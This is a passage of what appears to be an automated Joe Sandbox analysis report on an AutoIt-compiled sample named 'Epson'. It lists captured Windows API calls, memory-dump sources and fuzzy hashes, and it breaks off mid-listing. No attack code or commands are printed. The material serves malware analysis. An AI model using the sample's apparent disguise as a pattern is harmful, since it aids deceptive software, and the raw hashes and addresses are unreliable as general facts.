                                                                                                                                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00FF0C04,00000000), ref: 00FD3838
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00FD3848
                                                                                                                                                                                                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00FD386E
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00FD388D
                                                                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FD38AF
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FD3A9C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                      • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                      • Opcode ID: 06c0dbcc4e66ef44451d893f402ac82f0ce1859be45ea1ab221295b911bc8fcc
                                                                                                                                                                                                                                      • Instruction ID: f3e0ca0a45adabd1ab1e081ccb31977380862670f1cb6b4355a0235dd7c8e4ec
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06c0dbcc4e66ef44451d893f402ac82f0ce1859be45ea1ab221295b911bc8fcc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34025171900209AFDB14DF64CD89EAE7BBAEF48310F148159FA15AB2A0C775ED01DF61
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00FE7B67
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00FE7B98
                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00FE7BA4
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00FE7BBE
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00FE7BCD
                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00FE7BF8
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000010), ref: 00FE7C00
                                                                                                                                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00FE7C07
                                                                                                                                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 00FE7C16
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00FE7C1D
                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00FE7C68
                                                                                                                                                                                                                                      • FillRect.USER32(?,?,?), ref: 00FE7C9A
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FE7CBC
                                                                                                                                                                                                                                        • Part of subcall function 00FE7E22: GetSysColor.USER32(00000012), ref: 00FE7E5B
                                                                                                                                                                                                                                        • Part of subcall function 00FE7E22: SetTextColor.GDI32(?,00FE7B2D), ref: 00FE7E5F
                                                                                                                                                                                                                                        • Part of subcall function 00FE7E22: GetSysColorBrush.USER32(0000000F), ref: 00FE7E75
                                                                                                                                                                                                                                        • Part of subcall function 00FE7E22: GetSysColor.USER32(0000000F), ref: 00FE7E80
                                                                                                                                                                                                                                        • Part of subcall function 00FE7E22: GetSysColor.USER32(00000011), ref: 00FE7E9D
                                                                                                                                                                                                                                        • Part of subcall function 00FE7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FE7EAB
                                                                                                                                                                                                                                        • Part of subcall function 00FE7E22: SelectObject.GDI32(?,00000000), ref: 00FE7EBC
                                                                                                                                                                                                                                        • Part of subcall function 00FE7E22: SetBkColor.GDI32(?,?), ref: 00FE7EC5
                                                                                                                                                                                                                                        • Part of subcall function 00FE7E22: SelectObject.GDI32(?,?), ref: 00FE7ED2
                                                                                                                                                                                                                                        • Part of subcall function 00FE7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00FE7EF1
                                                                                                                                                                                                                                        • Part of subcall function 00FE7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FE7F08
                                                                                                                                                                                                                                        • Part of subcall function 00FE7E22: GetWindowLongW.USER32(?,000000F0), ref: 00FE7F15
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4124339563-0
                                                                                                                                                                                                                                      • Opcode ID: 89a8e7077461bd36de34f2ead022982d99adc3b521043f8d20e1652e64d87a8c
                                                                                                                                                                                                                                      • Instruction ID: dae78e8f14359c56b201da19acc17122e72109f7ac8eff7006fe216db7a7ccf8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89a8e7077461bd36de34f2ead022982d99adc3b521043f8d20e1652e64d87a8c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3A1A172408385BFD710AF64DC88E6BBBA9FF88330F140A19F9629A1E0D775D944EB51
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?), ref: 00F516B4
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F92B07
                                                                                                                                                                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F92B40
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F92F85
                                                                                                                                                                                                                                        • Part of subcall function 00F51802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F51488,?,00000000,?,?,?,?,00F5145A,00000000,?), ref: 00F51865
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001053), ref: 00F92FC1
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F92FD8
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F92FEE
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F92FF9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                      • Opcode ID: 1bd8d9d38255e407980ac70f9265ac9b593274578e138a365c5e9f599bd63452
                                                                                                                                                                                                                                      • Instruction ID: bee08ebb88a800823a8f4377186f51ec45dc4bd8b6bc4709353257a4f3b4ef28
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1bd8d9d38255e407980ac70f9265ac9b593274578e138a365c5e9f599bd63452
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E12E030A00201AFEB75DF14C884BA9B7E5FF45325F184129F995DB662C736EC86EB81
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 00FD319B
                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00FD32C7
                                                                                                                                                                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00FD3306
                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00FD3316
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00FD335D
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00FD3369
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00FD33B2
                                                                                                                                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00FD33C1
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00FD33D1
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00FD33D5
                                                                                                                                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00FD33E5
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FD33EE
                                                                                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00FD33F7
                                                                                                                                                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00FD3423
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00FD343A
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00FD347A
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00FD348E
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00FD349F
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00FD34D4
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00FD34DF
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00FD34EA
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00FD34F4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                      • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                      • Opcode ID: 5c7bbbcdaef874f471ee25125a7d6b3f536bd0fcde87add8f8c07c7826ca7880
                                                                                                                                                                                                                                      • Instruction ID: f3a73276c6e152f3667a4829ffcea216da0570a7e9d4af9c5ceab74ce0b48f0b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c7bbbcdaef874f471ee25125a7d6b3f536bd0fcde87add8f8c07c7826ca7880
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19B163B1A00215AFEB24DFA8CC85FAEBBB9EB44711F148115FA15EB290D774ED40DB90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00FC5532
                                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,00FEDC30,?,\\.\,00FEDCD0), ref: 00FC560F
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00FEDC30,?,\\.\,00FEDCD0), ref: 00FC577B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                      • Opcode ID: a6c9133d331ed4b91c9a9fd8908d95645558abc42de04ff3e90bc5f681f005a1
                                                                                                                                                                                                                                      • Instruction ID: 67e9e7e8c8dedbae13cf456dd4b6d868ec8ee3f6113c71e4023656d033ead10e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6c9133d331ed4b91c9a9fd8908d95645558abc42de04ff3e90bc5f681f005a1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3361BF32A4090EDBC724EF25CA93F7877B1AF44B64BA4401DE446AF255C629ADC1FB41
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00FE1BC4
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00FE1BD9
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00FE1BE0
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FE1C35
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00FE1C55
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00FE1C89
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FE1CA7
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FE1CB9
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00FE1CCE
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00FE1CE1
                                                                                                                                                                                                                                      • IsWindowVisible.USER32(00000000), ref: 00FE1D3D
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00FE1D58
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00FE1D6C
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00FE1D84
                                                                                                                                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00FE1DAA
                                                                                                                                                                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00FE1DC4
                                                                                                                                                                                                                                      • CopyRect.USER32(?,?), ref: 00FE1DDB
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 00FE1E46
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                      • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                      • Opcode ID: 33230991ef3326c0429f15b26523add92966bac5c867d8942af51da08280a9b3
                                                                                                                                                                                                                                      • Instruction ID: 96f560987ee1271f5cbb4af62cf04200027f715a5f190eb175f5f6ca15b8c82d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33230991ef3326c0429f15b26523add92966bac5c867d8942af51da08280a9b3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73B17E71604381AFD714DF66C885BABBBE5FF84310F00891CF99A9B261C735E845DB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00FE0D81
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FE0DBB
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FE0E25
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FE0E8D
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FE0F11
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00FE0F61
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FE0FA0
                                                                                                                                                                                                                                        • Part of subcall function 00F6FD52: _wcslen.LIBCMT ref: 00F6FD5D
                                                                                                                                                                                                                                        • Part of subcall function 00FB2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FB2BA5
                                                                                                                                                                                                                                        • Part of subcall function 00FB2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FB2BD7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                      • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                      • Opcode ID: bbcf37e5bc43379d6eacce6dddcf9ad184375f5c76f8d5e0c94699846859cf9e
                                                                                                                                                                                                                                      • Instruction ID: 25ea7538ed045ca1cd7d5a795d9462cf33e654bc3ec3d77d9308aa55236bb9bc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbcf37e5bc43379d6eacce6dddcf9ad184375f5c76f8d5e0c94699846859cf9e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22E1E6316043818FC714DF26C95197AB3E6FF84314B14896DF8969B3A1DB38ED45EB81
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F525F8
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00F52600
                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F5262B
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00F52633
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00F52658
                                                                                                                                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F52675
                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F52685
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F526B8
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F526CC
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00F526EA
                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00F52706
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F52711
                                                                                                                                                                                                                                        • Part of subcall function 00F519CD: GetCursorPos.USER32(?), ref: 00F519E1
                                                                                                                                                                                                                                        • Part of subcall function 00F519CD: ScreenToClient.USER32(00000000,?), ref: 00F519FE
                                                                                                                                                                                                                                        • Part of subcall function 00F519CD: GetAsyncKeyState.USER32(00000001), ref: 00F51A23
                                                                                                                                                                                                                                        • Part of subcall function 00F519CD: GetAsyncKeyState.USER32(00000002), ref: 00F51A3D
                                                                                                                                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,00F5199C), ref: 00F52738
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                      • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                      • Opcode ID: 79cf5390441ae29001c2cda325118adc54c28a78a1e84140c08ca42ac85a5e60
                                                                                                                                                                                                                                      • Instruction ID: 3cbfbbcf0b610cb54788317cd309bd06cf5d1d344f671ce31ef8522a54b11735
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79cf5390441ae29001c2cda325118adc54c28a78a1e84140c08ca42ac85a5e60
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DAB17A31A002099FDF24DFA8CC85BAE7BB5FB48325F104219FA55AB290DB74E941EF51
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00FB1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FB1A60
                                                                                                                                                                                                                                        • Part of subcall function 00FB1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00FB14E7,?,?,?), ref: 00FB1A6C
                                                                                                                                                                                                                                        • Part of subcall function 00FB1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00FB14E7,?,?,?), ref: 00FB1A7B
                                                                                                                                                                                                                                        • Part of subcall function 00FB1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00FB14E7,?,?,?), ref: 00FB1A82
                                                                                                                                                                                                                                        • Part of subcall function 00FB1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FB1A99
                                                                                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FB1741
                                                                                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FB1775
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00FB178C
                                                                                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00FB17C6
                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FB17E2
                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00FB17F9
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00FB1801
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00FB1808
